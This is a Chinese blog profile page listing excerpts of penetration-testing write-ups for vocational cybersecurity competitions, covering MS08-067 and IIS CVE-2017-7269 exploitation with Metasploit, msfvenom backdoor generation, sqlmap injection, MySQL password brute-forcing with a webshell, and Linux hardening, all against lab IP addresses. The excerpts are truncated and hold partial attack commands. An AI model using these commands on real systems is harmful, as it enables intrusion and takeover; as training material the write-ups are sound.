自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(10)
  • 资源 (5)
  • 收藏
  • 关注

原创 PHP代码审计-PHP危险函数及特殊函数

PHP代码审计-PHP危险函数及特殊函数

2023-02-20 09:50:07 965 1

原创 MS08-067漏洞渗透测试

提示:靶机 windows XP IP:172.16.5.27 攻击机 kali IP:172.16.5.28文章目录前言 漏洞介绍 nmap扫描 MS08-067利用 总结前言利用msfconsole控制台的exploit/windows/smb/ms08_067_netapi攻击模块对靶机445端口的攻击过程,成功进入后渗透,开启靶机的3389远程登录漏洞介绍:ms08_067漏洞是的著名...

2022-03-28 11:01:06 9567

原创 中职组“网络空间安全赛项”linux安全加固

提示:主要是针对中职组“网络空间安全赛项”的centos靶机的安全加固文章目录前言 一、SSH弱口令 二、FTP 匿名登录 三、Mysql弱口令 四、后门端口(高进程) 五、web网页 总结前言提示:本文主要是针对中职组“网络空间安全赛项”的centos靶机的安全加固,如果有什么不对的地方请各位指教,制作不易要是觉得有帮助请点赞支持提示:以下是本篇文章正文内容,下面案例可供参考一、SSH弱口令对于SSH的防护需要我们修改靶机的默认密码、禁用或者删除多余.

2022-03-27 18:50:49 5179

原创 2020年山东省网络空间安全技能大赛Web 安全之综合渗透测试

任务环境说明:服务器场景名称:服务器场景操作系统:未知(关闭链接)1.使用渗透机场景 Kali2.0 中的工具扫描服务器,通过扫描服务器得到 web端口,登陆网站(网站路径为 IP/up),找到网站首页中的 Flag 并提交;url输入172.16.5.193/up/ 查看源码发现一个flag路径打开后得到flagflag:sacasceafvdbtsd2.使用渗透机场景 windows7 访问服务其场景中的网站,通过上题给的信息获取本题,并将本题中的 Flag 提交;要

2022-01-10 18:18:06 4748

原创 2020年中职组“网络空间安全”赛项福州市信息隐藏分析

任务环境说明:服务器场景:Web20200529 服务器场景操作系统:未知 (关闭链接)1.通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,找到登录界面中的FLAG,并将FLAG提交;浏览器url输入ip地址访问网页,右键查看网页源码发现右键没有反应,没事我们按下F12照样可以看到源码找到sources中的class.css文件 里面就有flag2.通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,找到登录

2021-12-15 15:45:22 444

原创 msfvenom生成后台木马监听目标(windows渗透测试)

针对windows操作系统的渗透测试操作过程概况:利用msf生成一个后台木马,使用exploit/multi/handler模块,通过对方打开的形式获取权限,可以进入后渗透对目标进行监听等操作。实战:一:后台木马生成注意在代码中LHOST:172.16.5.2与LPORT:4444 要根据实际情况来更改LHOST设置为渗透机的ip LPORT设置为监听的端口,端口只要不是已经占用的就可以msfvenom -a x86 --platform windows -p windows/m.

2021-12-06 10:07:48 8143 4

原创 Windows操作系统渗透测试(IIS远程连接)

前言实验环境说明:渗透机:kali IP地址:172.16.5.3靶 机:Windows 2003 IP地址:172.16.5.108攻击工具:metasploit1.使用脚本http-webdav-scan探测目标靶机的iis服务是否存在漏洞nmap -n --sscript http-webdav-scan 172.16.5.1082.进入msf调用cve-2017-7269模块配置目标ip后运行这里就已经进入靶机后台但是权限较低然后需要设置编码为GB...

2021-11-25 14:41:29 4614 1

原创 使用反弹木马进行提权

渗透机:kail ip:172.16.5.6靶 机:linux ip:172.16.5.7客户端:windows XP ip: 172.16.5.128通过Nikto对服务器80端口进行扫描:nikto-hosthttp://172.16.1.200发现了login.php文件与phpmyadmin/目录所以直接在浏览器中访问login.phpsqlmap -u “http://172.16.5.7/login.php” --forms --level 3 -...

2021-11-24 08:18:08 4193

原创 linux渗透测试Metasploit模块(暴力破解数据库密码)

前言学习内容:通过Metasploit暴力破解数据库密码,并在数据库中写入一句话木马。渗透机:172.16.5.196 含有字典2.txt靶机:172.16.5.192 安装了mysql vsftpd服务要保证渗透机与靶机要ping的通1.输入msfconsole启动Metasploit,使用/auxiliary/scanner/mysql/mysql_loginuse /auxiliary/scanner/mysql/mysql_login2.设置目标IP地址...

2021-11-23 18:52:06 2466

原创 2021年中职组“网络安全分析”赛项湖南省详细分析

1.通过本地PC中的渗透测试平台KALI2020下载靶机中的数据包,通过WIRESHARK软件分析数据包内的数据,找到黑客攻击服务器所用的内网IP,将黑客使用的IP地址进行MD5加密后作为FLAG进行提交;(25分)通过简单的http过滤发现了 172.16.5.88与172.16.5.154这两个ip地址这么看就很明显172.16.5.88是黑客ip而172.16.5.154是服务器ipFLAG:..

2021-11-22 15:52:24 1714

2020年中职组“网络空间安全赛项”福州市竞赛任务书.xls

2020年中职组“网络空间安全赛项”福州市竞赛任务书

2021-12-15

ZZ-2021029 网络安全赛项赛题.zip

网络安全赛项赛题

2021-11-23

2021年中职组“网络安全”赛项宿州市任务书(1)(1).docx

2021年中职组“网络安全”赛项宿州市任务书

2021-11-23

2021年中职组“网络安全”赛项合肥市任务书.docx

2021年中职组“网络安全”赛项合肥市任务书

2021-11-23

2021年中职组“网络安全”赛项湖南省任务书.xls

2021年中职组“网络安全”赛项湖南省任务书

2021-11-23

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除